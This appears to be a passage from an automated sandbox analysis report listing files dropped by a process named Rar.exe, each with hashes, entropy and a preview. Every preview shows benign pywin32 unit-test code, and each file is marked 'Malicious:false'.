                                                                                                                                                                                      SHA-256:9A39FCE6B220CC16C66E8C3F0CF599CA8662F2E4EAA3C9B97192417E133C0FBB
                                                                                                                                                                                      SHA-512:CF19F968B5E04B9643EA308A42B624CC5631809440432B4F8C116A648792F4364805DDE07BB5CE271EE0DEDF131A60636FB6A87F9E4C12861F0E85CA407DB478
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import sys.import unittest..import pywintypes.import win32api...# A class that will never die vie refcounting, but will die via GC..class Cycle:. def __init__(self, handle):. self.cycle = self. self.handle = handle...class PyHandleTestCase(unittest.TestCase):. def testCleanup1(self):. # We used to clobber all outstanding exceptions.. def f1(invalidate):. import win32event.. h = win32event.CreateEvent(None, 0, 0, None). if invalidate:. win32api.CloseHandle(int(h)). 1 / 0. # If we invalidated, then the object destruction code will attempt. # to close an invalid handle. We don't wan't an exception in. # this case.. def f2(invalidate):. """This function should throw an IOError.""". try:. f1(invalidate). except ZeroDivisionError as exc:. raise IOError("raise 2").. self.assertRaises(IOError,
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4128
                                                                                                                                                                                      Entropy (8bit):4.766945925977974
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:l983zkCeM2cH6EXhnHXQetwU3CzTIVJM4WOdzEa9TIVNWdx17a0d2jlfS:HSzQncjA09SzTIVJiS9TIVwdxE0d2jlq
                                                                                                                                                                                      MD5:707A3C38CA9599DEE8D886F84AC1048C
                                                                                                                                                                                      SHA1:F3A07C7B293C479A48631895FEE5FC7B72ED45C1
                                                                                                                                                                                      SHA-256:CC1A7875EF1EC4B6B5C50FCFA5EE92D386E69EF6DF4DB2FF6F4E8B081E16A0B2
                                                                                                                                                                                      SHA-512:1B1D2FA8F2C469178DA6C93926C5BFF38CA3050B17AE857E3321EAEC37E7D9C96C96C52D13A249F5D8E335092D960DCE74EA89A816692DD02AD6CF35AA074922
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# General test module for win32api - please add some :).import array.import os.import sys.import unittest..import pywintypes.import win32con.import win32gui.from pywin32_testutil import str2bytes.from win32clipboard import *..custom_format_name = "PythonClipboardTestFormat"...class CrashingTestCase(unittest.TestCase):. def test_722082(self):. class crasher(object):. pass.. obj = crasher(). OpenClipboard(). try:. EmptyClipboard(). # This used to crash - now correctly raises type error.. self.assertRaises(TypeError, SetClipboardData, 0, obj). finally:. CloseClipboard()...class TestBitmap(unittest.TestCase):. def setUp(self):. self.bmp_handle = None. try:. this_file = __file__. except NameError:. this_file = sys.argv[0]. this_dir = os.path.dirname(this_file). self.bmp_name = os.path.join(. os.path.abspath(this_dir), "..", "Demo
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8401
                                                                                                                                                                                      Entropy (8bit):4.658954261945094
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:So/OWyYIRBuPHT7+F32bA2SV+SCJE+SCJbu1pZV2+SY1QN95pxJUyXRvUgLIUqr8:/rnPNFNiZrj1C5TJUng8YhYDQWq
                                                                                                                                                                                      MD5:EA5E07027F4DBF3C8BB1196FAAF915A2
                                                                                                                                                                                      SHA1:47CBA1C28BBFD1B9EB4E152B5B869BB6E10765DF
                                                                                                                                                                                      SHA-256:242D1EA4E8096B43DB499870C4EDFA10EDA5F43B72BB8C7530D8ED8CC27D78F3
                                                                                                                                                                                      SHA-512:94435C3A55280F9B818A4728C3B78258AF09F2FBD88521EDEA4B7ED8611A5025F9E972A18B13D433FE496BC8670D53C542F46239386E25D7124875CC52A53428
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Test pywin32's error semantics""".import sys.import unittest..import pythoncom.import pywintypes.import win32api.import win32file.import winerror...class TestBase(unittest.TestCase):. def _testExceptionIndex(self, exc, index, expected):. # check the exception itself can be indexed if not py3k. if sys.version_info < (3,):. self.assertEqual(exc[index], expected). # and that exception.args can is the same.. self.assertEqual(exc.args[index], expected)...class TestAPISimple(TestBase):. def _getInvalidHandleException(self):. try:. win32api.CloseHandle(1). except win32api.error as exc:. return exc. self.fail("Didn't get invalid-handle exception.").. def testSimple(self):. self.assertRaises(pywintypes.error, win32api.CloseHandle, 1).. def testErrnoIndex(self):. exc = self._getInvalidHandleException(). self._testExceptionIndex(exc, 0, winerror.ERROR_INVALID_HANDLE).. def test
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8472
                                                                                                                                                                                      Entropy (8bit):4.201102143048348
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:gUhWzBHkMBDTwqO10iXNMy0Re5qN/iXb1iES61Ypz6jYpMQUkXlsK9SH2F2fupUO:gUCMmeMym/I1RBLup2q
                                                                                                                                                                                      MD5:BD17A4E829646A8C6BFD0AD0E92C33D1
                                                                                                                                                                                      SHA1:7C73924F5EE596727E9B2D09F5053CCA3D5ED402
                                                                                                                                                                                      SHA-256:C1915D09E993B9A0ADD6473CDF1875ECE33242560FA283D4799F191F8D7CB40D
                                                                                                                                                                                      SHA-512:64EBF976C4AE5C1193CD9C5B811B133B227E040F5BE17738A0F684C3BFB0F0DB10665A880A4E429A732A1FA258344A575CFA7CAB941D086B82EB2B8B87CDDDD9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# odbc test suite kindly contributed by Frank Millman..import os.import sys.import tempfile.import unittest..import odbc.import pythoncom.from pywin32_testutil import TestSkipped, str2bytes, str2memory.from win32com.client import constants..# We use the DAO ODBC driver.from win32com.client.gencache import EnsureDispatch...class TestStuff(unittest.TestCase):. def setUp(self):. self.tablename = "pywin32test_users". self.db_filename = None. self.conn = self.cur = None. try:. # Test any database if a connection string is supplied.... conn_str = os.environ["TEST_ODBC_CONNECTION_STRING"]. except KeyError:. # Create a local MSAccess DB for testing.. self.db_filename = tempfile.NamedTemporaryFile().name + ".mdb".. # Create a brand-new database - what is the story with these?. for suffix in (".36", ".35", ".30"):. try:. dbe = EnsureDispatch("DAO.DBEngine" + s
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4174
                                                                                                                                                                                      Entropy (8bit):4.637672143449211
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:tNosBlfXH+L5MWcs+dS4UOFHFaobEUo8hHFcocGu2E+SRNATocQSRNW6h6zJsajn:v7BlmTsrMobDo8VCddeD6VThwUflkoYq
                                                                                                                                                                                      MD5:A35DD3413F96F8865095071BA336714D
                                                                                                                                                                                      SHA1:040F057F3A635E26C6DC118431707F7A537C69D2
                                                                                                                                                                                      SHA-256:5BACA647B02030064503F9F3AEEB3D9BA60DB7F6CAC841AB0E482EF686D67A7E
                                                                                                                                                                                      SHA-512:8B623CFA039D136860BDEB8795E385D7DDDB80B9BC617CF88788B6E3E19DC2AD3B3BDB4A47CB11403F6E4866F3E49B2E10A201D1513A638A513875D554C80592
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import datetime.import operator.import sys.import time.import unittest..import pywintypes.from pywin32_testutil import ob2memory, str2bytes...class TestCase(unittest.TestCase):. def testPyTimeFormat(self):. struct_current = time.localtime(). pytime_current = pywintypes.Time(struct_current). # try and test all the standard parts of the format. # Note we used to include '%Z' testing, but that was pretty useless as. # it always returned the local timezone.. format_strings = "%a %A %b %B %c %d %H %I %j %m %M %p %S %U %w %W %x %X %y %Y". for fmt in format_strings.split():. v1 = pytime_current.Format(fmt). v2 = time.strftime(fmt, struct_current). self.assertEqual(v1, v2, "format %s failed - %r != %r" % (fmt, v1, v2)).. def testPyTimePrint(self):. # This used to crash with an invalid, or too early time.. # We don't really want to check that it does cause a ValueError. # (as hopefully t
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6062
                                                                                                                                                                                      Entropy (8bit):4.7616285907258655
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:04wcdxEB2ZSCeZQB1ZLp7CeH/ofXhGhFXhvhCue9quC6gNBn/9zZ9C/WflV9y5+C:nrEB2ZSFeZ97FApULJCxA1Xi
                                                                                                                                                                                      MD5:6CA4F005229E95EEC6E06F171FADC39D
                                                                                                                                                                                      SHA1:3329FA02380512F6D6FF6F4A90B3B8CDB740290F
                                                                                                                                                                                      SHA-256:C03DA11EE20F451145E9988056BF247E60F1FF16F91D3592F8537E420BE0DAC7
                                                                                                                                                                                      SHA-512:9127B7140C9A0FFFD02B12D9728DE19DE4BB0254DA8841FA43E23DB3CF14FD3AF89F45A3B2D909C1ABB115B6D2869CC9260FF4D7F20B86DBB8825FAA5DBA17C8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Tests for the win32security module..import unittest..import ntsecuritycon.import pywintypes.import win32api.import win32con.import win32security.import winerror.from pywin32_testutil import TestSkipped, ob2memory, testmain...class SecurityTests(unittest.TestCase):. def setUp(self):. self.pwr_sid = win32security.LookupAccountName("", "Power Users")[0]. try:. self.admin_sid = win32security.LookupAccountName("", "Administrator")[0]. except pywintypes.error as exc:. # in automation we see:. # pywintypes.error: (1332, 'LookupAccountName', 'No mapping between account names and security IDs was done.'). if exc.winerror != winerror.ERROR_NONE_MAPPED:. raise. self.admin_sid = None.. def tearDown(self):. pass.. def testEqual(self):. if self.admin_sid is None:. raise TestSkipped("No 'Administrator' account is available"). self.assertEqual(. win32security
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8302
                                                                                                                                                                                      Entropy (8bit):4.875534408590997
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:FBX6jbS83P2gdpH7LS8iiNdD2gXQR6cDGeQ7hS2R3EHQC4JwOkyB5D4BGQaFHT8T:FMjxy8eQ4jTLX
                                                                                                                                                                                      MD5:EE93B23110B338A67D7B16EE25FA9C74
                                                                                                                                                                                      SHA1:57DECEBFD48BE30E7FC3BEB2F6D918EB4254211A
                                                                                                                                                                                      SHA-256:F47AB384C7FB9F7A91DF36A23AA2FE04F24F0C4263C00227DA6295119A32E98C
                                                                                                                                                                                      SHA-512:2613DA7651AA4B78992742ECE85726AA3E14D979C73C90B2D2C9BB2A4ACE11BA1EB8E9442B5F72DF54B2E1A10F0B5545A23FFB9A987A2EB5BFF1452069019A8B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Some tests of the win32security sspi functions..# Stolen from Roger's original test_sspi.c, a version of which is in "Demos".# See also the other SSPI demos..import re.import unittest..import sspi.import sspicon.import win32api.import win32security.from pywin32_testutil import TestSkipped, str2bytes, testmain...# It is quite likely that the Kerberos tests will fail due to not being.# installed. The NTLM tests do *not* get the same behaviour as they should.# always be there..def applyHandlingSkips(func, *args):. try:. return func(*args). except win32api.error as exc:. if exc.winerror in [. sspicon.SEC_E_NO_CREDENTIALS,. sspicon.SEC_E_NO_AUTHENTICATING_AUTHORITY,. ]:. raise TestSkipped(exc). raise...class TestSSPI(unittest.TestCase):. def assertRaisesHRESULT(self, hr, func, *args):. try:. return func(*args). raise RuntimeError("expecting %s failure" % (hr,)). except win32security.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9777
                                                                                                                                                                                      Entropy (8bit):4.737552851480279
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:DnnthSWhtC9JDMNUT6BykBhRGmRBKKbbq:DHwnTkhBSSy
                                                                                                                                                                                      MD5:9594739675AC8888353B9128957829E3
                                                                                                                                                                                      SHA1:C5238B021894FC502967B174245558371E60AC51
                                                                                                                                                                                      SHA-256:7E4C25D092C23E3B72EE250646723A651FDF01D8897A9B070CA9D14974BC2B5B
                                                                                                                                                                                      SHA-512:C5F80160BBA272FD56B3E8D34796CE6F55C772FC1B8B2EEA8FC8AB3E4E8A20234DFA4ADAE18D6A41688BC03D98CA92A35C74C19E457836E5BB4C520E5CDC874E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# General test module for win32api - please add some :)..import datetime.import os.import sys.import tempfile.import unittest..import win32api.import win32con.import win32event.import winerror.from pywin32_testutil import TestSkipped, str2bytes...class CurrentUserTestCase(unittest.TestCase):. def testGetCurrentUser(self):. domain = win32api.GetDomainName(). if domain == "NT AUTHORITY":. # Running as a service account, so the comparison will fail. raise TestSkipped("running as service account"). name = "%s\\%s" % (domain, win32api.GetUserName()). self.assertEqual(name, win32api.GetUserNameEx(win32api.NameSamCompatible))...class TestTime(unittest.TestCase):. def testTimezone(self):. # GetTimeZoneInformation. rc, tzinfo = win32api.GetTimeZoneInformation(). if rc == win32con.TIME_ZONE_ID_DAYLIGHT:. tz_str = tzinfo[4]. tz_time = tzinfo[5]. else:. tz_str = tzinfo[1].
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4348
                                                                                                                                                                                      Entropy (8bit):4.720005452927387
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:nGTNTZHftZ6VavazzOwoG+NbJXGa/Y7/fNSLGhLOL/LpFyQTu1nPyi:nGTNVYPOw3kW6YwQSz3yzpai
                                                                                                                                                                                      MD5:1CF5B09510844FF5502DC5B220560F95
                                                                                                                                                                                      SHA1:A0897F1482D46F77E6495F3F7AFC104899539A26
                                                                                                                                                                                      SHA-256:C26885E898631804BB04402F9976AE2BE813C96E43491CFDC52A9081A12C8FD7
                                                                                                                                                                                      SHA-512:6590871E9392D4A48E74B31DBF4B8A053C6C4807E74857A987D57D93D0D13B493144BC6582E08FA426131DA230B8D4C4CD9165499A0ECAC534AA2AF2D97C153D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Test module for win32crypt..import contextlib.import unittest.from typing import Any, Iterator..import win32crypt.from pywin32_testutil import TestSkipped, find_test_fixture, testmain.from win32cryptcon import *...class Crypt(unittest.TestCase):. def testSimple(self):. data = b"My test data". entropy = None. desc = "My description". flags = 0. ps = None. blob = win32crypt.CryptProtectData(data, desc, entropy, None, ps, flags). got_desc, got_data = win32crypt.CryptUnprotectData(. blob, entropy, None, ps, flags. ). self.assertEqual(data, got_data). self.assertEqual(desc, got_desc).. def testEntropy(self):. data = b"My test data". entropy = b"My test entropy". desc = "My description". flags = 0. ps = None. blob = win32crypt.CryptProtectData(data, desc, entropy, None, ps, flags). got_desc, got_data = win32crypt.CryptUnprotectData(. blob, entro
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4368
                                                                                                                                                                                      Entropy (8bit):4.690266362009521
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:uBZpBvpjiDWFpjSXSjvDpwWlXySJH6jHN6HzS5V6pLqx7rLK0EI1ZcVZ3q:gfBvZiDWFZSXSjvDpwWUS16TNUzFpLq5
                                                                                                                                                                                      MD5:DBC9AF40F38CB83121A9E353B9E9F4DC
                                                                                                                                                                                      SHA1:843B250EA21D3143DA09A8FA1151C95753A9D65B
                                                                                                                                                                                      SHA-256:5D0A81BDAF6B31854D8AEEE3026C2120C7A9CE67BA7E721DEE59BBC502D37B0E
                                                                                                                                                                                      SHA-512:B2BB5BAE444FAD9EDC744B36134747F994619DA1112092D4B6E66A07FED93D0358795CEBE324EC42CC3D5238C8E9738DFE0201B03DCD35016606A33121AB2158
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import unittest..import pywintypes.import win32event...class TestWaitableTimer(unittest.TestCase):. def testWaitableFire(self):. h = win32event.CreateWaitableTimer(None, 0, None). dt = -160 # 160 ns.. win32event.SetWaitableTimer(h, dt, 0, None, None, 0). rc = win32event.WaitForSingleObject(h, 1000). self.assertEqual(rc, win32event.WAIT_OBJECT_0).. def testCreateWaitableTimerEx(self):. h = win32event.CreateWaitableTimerEx(. None,. None,. win32event.CREATE_WAITABLE_TIMER_HIGH_RESOLUTION,. win32event.TIMER_ALL_ACCESS,. ). dt = -160 # 160 ns.. win32event.SetWaitableTimer(h, dt, 0, None, None, 0). rc = win32event.WaitForSingleObject(h, 1000). self.assertEqual(rc, win32event.WAIT_OBJECT_0).. def testWaitableTrigger(self):. h = win32event.CreateWaitableTimer(None, 0, None). # for the sake of this, pass a long that doesn't fit in an int.. dt =
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):41414
                                                                                                                                                                                      Entropy (8bit):4.594168917066703
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:cIh0aKGyRwRGUtfoKkTu3zCz69SNrCs9MNzz:cIcUSK59SNl6
                                                                                                                                                                                      MD5:B01817532C78A687745ACA880BD3EA14
                                                                                                                                                                                      SHA1:0FA966057DA2955C9210E9BD87ED461B5EE1258C
                                                                                                                                                                                      SHA-256:A1593D886BBA6F5CBE6C3DC35E11F8FD4655BAAEAAB8FA13B0121F6E06200FEF
                                                                                                                                                                                      SHA-512:09B9FD7341C605E83DC2B66F375CDC5148D340EF9290D229EF64E1932C9EF3EAC98D3F99262F1449EE3A2646969566D349D9151FEBBE69BAFED9CC57EFE2FA38
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import datetime.import os.import random.import shutil.import socket.import tempfile.import threading.import time.import unittest..import ntsecuritycon.import pywintypes.import win32api.import win32con.import win32event.import win32file.import win32pipe.import win32timezone.import winerror.from pywin32_testutil import TestSkipped, str2bytes, testmain..try:. set.except NameError:. from sets import Set as set...class TestReadBuffer(unittest.TestCase):. def testLen(self):. buffer = win32file.AllocateReadBuffer(1). self.assertEqual(len(buffer), 1).. def testSimpleIndex(self):. buffer = win32file.AllocateReadBuffer(1). buffer[0] = 0xFF. self.assertEqual(buffer[0], 0xFF).. def testSimpleSlice(self):. buffer = win32file.AllocateReadBuffer(2). val = str2bytes("\0\0"). buffer[:2] = val. self.assertEqual(buffer[0:2], val)...class TestSimpleOps(unittest.TestCase):. def testSimpleFiles(self):. fd, filename = tem
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2302
                                                                                                                                                                                      Entropy (8bit):4.717077495501314
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:bWT/FjXsP4D4O4AzIpbWsdKMns71gnswF7AIs72RrsibpVS:iTdj7EDAzu7KMB/NJ5bfS
                                                                                                                                                                                      MD5:9839103A9BD6F1BAF4EAE2B7049BB275
                                                                                                                                                                                      SHA1:88D504A84342DDF66DEB4DE8D8441B8F976C6611
                                                                                                                                                                                      SHA-256:25938BF01CCD24988D82267FDEC66EB77AB4391B979664C63408F3F5E1D4EEAD
                                                                                                                                                                                      SHA-512:1B9BBA0BBCD2826757BAB4C063485C9C8938CAD6552D00ACD2ECCEAB0FFC5F3B5C2F6E55A77A16EB36D02E9DB5866A7979E941CE22F9C43955890F8848719127
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# tests for win32gui.import array.import operator.import unittest..import pywin32_testutil.import win32gui...class TestPyGetString(unittest.TestCase):. def test_get_string(self):. # test invalid addresses cause a ValueError rather than crash!. self.assertRaises(ValueError, win32gui.PyGetString, 0). self.assertRaises(ValueError, win32gui.PyGetString, 1). self.assertRaises(ValueError, win32gui.PyGetString, 1, 1)...class TestPyGetMemory(unittest.TestCase):. def test_ob(self):. # Check the PyGetMemory result and a bytes string can be compared. test_data = b"\0\1\2\3\4\5\6". c = array.array("b", test_data). addr, buflen = c.buffer_info(). got = win32gui.PyGetMemory(addr, buflen). self.assertEqual(len(got), len(test_data)). self.assertEqual(bytes(got), test_data).. def test_memory_index(self):. # Check we can index into the buffer object returned by PyGetMemory. test_data = b"\0\1\2\3\4\5\6".
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9207
                                                                                                                                                                                      Entropy (8bit):4.533453807750783
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:nWriufXQ/QFNgSE/wFNNLeWt6bETl3RVFHg1BE2xdF+V1K++V3b6vXEFcccUTcH2:exXGQFNgSywFNNLdtqrXTKXnVXHWXwq
                                                                                                                                                                                      MD5:70BD28AEBE79AF642176356266E86D33
                                                                                                                                                                                      SHA1:FBCA88DB18EAAF543337A1000A98AAD79334B27C
                                                                                                                                                                                      SHA-256:90D0EA872D2FBF16E54A88674A9757C6A0C1E017E32D18B9ED2BEF4D1F9790C0
                                                                                                                                                                                      SHA-512:9A83B04471386AAEB6784333027817724BBA387991E6E0686D047B6170624DFE27517E7C40FEED775429C0D5C2595ACB525E1F12FADC436AEB0E99C641EF140D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import array.import unittest..import pythoncom.import win32con.import win32gui.import win32gui_struct...class TestBase(unittest.TestCase):. def assertDictEquals(self, d, **kw):. checked = dict(). for n, v in kw.items():. self.assertEqual(v, d[n], "'%s' doesn't match: %r != %r" % (n, v, d[n])). checked[n] = True. checked_keys = list(checked.keys()). passed_keys = list(kw.keys()). checked_keys.sort(). passed_keys.sort(). self.assertEqual(checked_keys, passed_keys)...class TestMenuItemInfo(TestBase):. def _testPackUnpack(self, text):. vals = dict(. fType=win32con.MFT_MENUBARBREAK,. fState=win32con.MFS_CHECKED,. wID=123,. hSubMenu=1234,. hbmpChecked=12345,. hbmpUnchecked=123456,. dwItemData=1234567,. text=text,. hbmpItem=321,. ). mii, extras = win32gui_struct.PackMENUITEMINFO(**vals). (.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3119
                                                                                                                                                                                      Entropy (8bit):4.5523866481379365
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:zfKwKrRJv8sWEFOphvScSkXGSOW8Ra8Ti:qPtcScSDVRri
                                                                                                                                                                                      MD5:30F3C8445F7A56D3A6A07D084086F837
                                                                                                                                                                                      SHA1:6AF609BF8A6FED9C17C5AFA907B2E13D01280F4D
                                                                                                                                                                                      SHA-256:FC5CDEC444E91779C64EB1BFCA9C089F3EC5FDDA916C857C79C436417834F3C2
                                                                                                                                                                                      SHA-512:2AF989A15B3DB5029104BA44CB37CE2E96F59E0BFF9396921419C1E9D26C51BA9A93679AF0C7F31DF463185DE81990DE6D6DA64C8ED8D2210818B9E4CDB177BC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import unittest..import winerror.from pywin32_testutil import str2bytes # py3k-friendly helper.from pywin32_testutil import TestSkipped, testmain.from win32inet import *.from win32inetcon import *...class CookieTests(unittest.TestCase):. def testCookies(self):. data = "TestData=Test". InternetSetCookie("http://www.python.org", None, data). got = InternetGetCookie("http://www.python.org", None). # handle that there might already be cookies for the domain.. bits = map(lambda x: x.strip(), got.split(";")). self.assertTrue(data in bits).. def testCookiesEmpty(self):. try:. InternetGetCookie("http://site-with-no-cookie.python.org", None). self.fail("expected win32 exception"). except error as exc:. self.assertEqual(exc.winerror, winerror.ERROR_NO_MORE_ITEMS)...class UrlTests(unittest.TestCase):. def testSimpleCanoniuserze(self):. ret = InternetCanoniuserzeUrl("foo bar"). self.ass
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):654
                                                                                                                                                                                      Entropy (8bit):4.2763245113043284
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:LLfJ4LfzmlIuXi7aL9xrClXlfvNKEdtevSobuXi1FC7hGtfTteNy2pV7u:JumlIKIaL9x2JlfVKE1eK40sUHpVS
                                                                                                                                                                                      MD5:6517E211765BE18E6404AFDD997C8BF0
                                                                                                                                                                                      SHA1:0624B162D53626409F7E2695EDEF22D8A2BE4AC3
                                                                                                                                                                                      SHA-256:C16266E7473FBED90C72820700F36236FCDC3E103A8D7EC38D990514245B7D79
                                                                                                                                                                                      SHA-512:A28CD960ED1F4F23176AF14980B81315A3AC85645FFBE4745A4762B9A8A93071FED11CE4DCFEBBBDA6B7F3530ACFB6129C18966CD1367B0FD02C088DBFE0051C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import unittest..import win32net.import win32netcon...class TestCase(unittest.TestCase):. def testGroupsGoodResume(self, server=None):. res = 0. level = 0 # setting it to 1 will provide more detailed info. while True:. (user_list, total, res) = win32net.NetGroupEnum(server, level, res). for i in user_list:. pass. if not res:. break.. def testGroupsBadResume(self, server=None):. res = 1 # Can't pass this first time round.. self.assertRaises(win32net.error, win32net.NetGroupEnum, server, 0, res)...if __name__ == "__main__":. unittest.main().
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5007
                                                                                                                                                                                      Entropy (8bit):4.707530904909143
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:jvp065vE0nI1jmQ4cOYBXc6YBkycTPk0Cczq:7nI16Q4cOYBXc6YBkycTPk0Cczq
                                                                                                                                                                                      MD5:82B8034B800E3839C5A973E495B91D10
                                                                                                                                                                                      SHA1:CB1A55C670BED07E8A2C4E1C5643CB9E4FE27276
                                                                                                                                                                                      SHA-256:6A564ED70F0E79A5ED160540A0A5B2405E4BF404930B431FB8B743C6F8C176EB
                                                                                                                                                                                      SHA-512:FFCB2522AB15717DF4D687CA14CCDD3B5B7D8B7D2423BB92C94EB4919D7FF223A145AFEB9FA77AADE1F8B27202561911230A05600469BD80DEE64021A2D9C810
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
